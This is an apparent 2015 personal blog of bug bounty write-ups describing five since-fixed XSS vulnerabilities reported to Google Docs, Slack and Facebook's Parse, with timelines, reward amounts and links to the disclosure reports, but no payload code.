Sunday, November 29, 2015

Stored XSS in Google Docs (Bug Bounty)

I have found a Stored Cross Site Scripting vulnerability in Google Docs (https://docs.google.com). The XSS was pretty simple and at first I was not expecting a reward. The vulnerability lies within the main Google Docs interface (creating a document.). To reproduce, create an HTML file embed with the payload. Then save it as HTML and open it. Drag and drop the produced XSS vector in to Google Docs and XSS will pop. The vulnerability was fixed by Google within a week (pretty fast). I also received a bounty and listed in their Hall of Fame. I got the "Elite (31337/eleet)" reward.


Image POC: 






Video POC: 






Timeline:

November 4 ----- Reported
November 5 ----- Report was Triaged
November 6 ----- A bug was filed according to Michael J. (Google Security Team)
November 12 ---- Rewarded by Google Security Team

 
Reward:

$3,133.7 


Friday, November 13, 2015

Stored XSS in Slack via emoji (Bug Bounty)

I have found ANOTHER cross site scripting in Slack. This time, a Stored one, the most dangerous of all XSS... Anyway, The payload I used is very unique, the XSS has to be popped up thru an emoji. The Slack security team fixed this pretty fast since the XSS is a Stored one. This was my third bug from Slack.. and I immediately rose to Top 26 in their thanks page (https://hackerone.com/slack/thanks/). For more details regarding my report, just visit this link: https://hackerone.com/reports/96337


Image POC:

      






Reward:

$500

Reflected XSS in Slack (Bug Bounty)

I have found another Cross site scripting vulnerability in Slack. This time it is a Reflected XSS. The XSS was located in the team integration search bar. The bug was fixed immediately by the Slack security team. This was my second bug from Slack. You can read more about my report, just visit this site: https://hackerone.com/reports/97683

Image:




Reward:

$100 

XSS in Slack (Bug bounty)

I have found a Cross Site Scripting vulnerability in Slack. The XSS lies in the creation of new post. The XSS can be triggered by formatting text as code. Just type in the payload then change it to code format. The bug has been fixed by the Slack security team. The link of my report can be found here: https://hackerone.com/reports/89505


Image POC:


Reward:

$100 

Stored XSS in Parse (Bug Bounty)

I found a Stored Cross Site Scripting vulnerability in Parse, a Facebook Acquisition. The Stored XSS was located in the App dashboard. I have reported it to Facebook and have rewarded me with a $1000 bounty and I was also listed in their "Whitehat List" for the year 2015. The issue was fixed by the Facebook security team. Here is the video for more details. 
WhiteHat list: https://www.facebook.com/whitehat/thanks


Video:
 

  

Reward:

$1000